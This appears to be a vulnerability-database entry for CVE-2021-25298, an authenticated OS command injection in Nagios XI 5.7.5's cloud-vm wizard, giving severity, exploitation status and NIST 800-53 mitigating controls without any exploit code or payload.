CVE-2021-25298
Published: 15 February 2021
Summary
CVE-2021-25298 is a high-severity OS Command Injection (CWE-78) vulnerability in Nagios Nagios Xi. Its CVSS base score is 8.8 (High).
Operationally, ranked in the top 1.1% of CVEs by exploit likelihood; CISA has added it to the Known Exploited Vulnerabilities catalog; a public proof-of-concept is referenced.
The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and AC-6 (Least Privilege).
Deeper analysis
Nagios XI version xi-5.7.5 contains an OS command injection vulnerability in the file /usr/local/nagiosxi/html/includes/configwizards/cloud-vm/cloud-vm.inc.php. The flaw arises from insufficient sanitization of input supplied by an authenticated user in a single HTTP request, enabling execution of arbitrary operating system commands on the Nagios XI server. The issue is tracked as CVE-2021-25298 with a CVSS 3.1 score of 8.8 and is associated with CWE-78.
An authenticated attacker with network access can exploit the weakness by submitting a crafted HTTP request to the affected component. Successful exploitation allows the attacker to run arbitrary commands on the underlying server, resulting in high impact to confidentiality, integrity, and availability without requiring user interaction.
Public references include the Nagios versions.php page for software updates along with detailed exploit descriptions on PacketStorm and GitHub that demonstrate remote code execution against version 5.7.5. No specific mitigation steps beyond upgrading are described in the provided references.
EU & UK References
- 🇪🇺 ENISA EUVD: EUVD-2021-12198
Vulnerability details
Nagios XI version xi-5.7.5 is affected by OS command injection. The vulnerability exists in the file /usr/local/nagiosxi/html/includes/configwizards/cloud-vm/cloud-vm.inc.php due to improper sanitization of authenticated user-controlled input by a single HTTP request, which can lead to OS command injection on the Nagios…
more
XI server.
- CWE(s)
- KEV Date Added
- 18 January 2022
Related Threats
No named actor attribution yet. ATT&CK technique mapping in progress for this CVE.
Affected Assets
Mitigating Controls
Mitigating Controls (NIST 800-53 r5) AI
Directly requires validation and sanitization of all user-supplied input before it is used in OS commands, blocking the exact flaw in cloud-vm.inc.php.
Limits privileges of the web-server process and Nagios account so that even a successful injection yields minimal OS-level impact.
Can be configured to inspect and block command-execution patterns or malicious payloads submitted via HTTP to the affected wizard.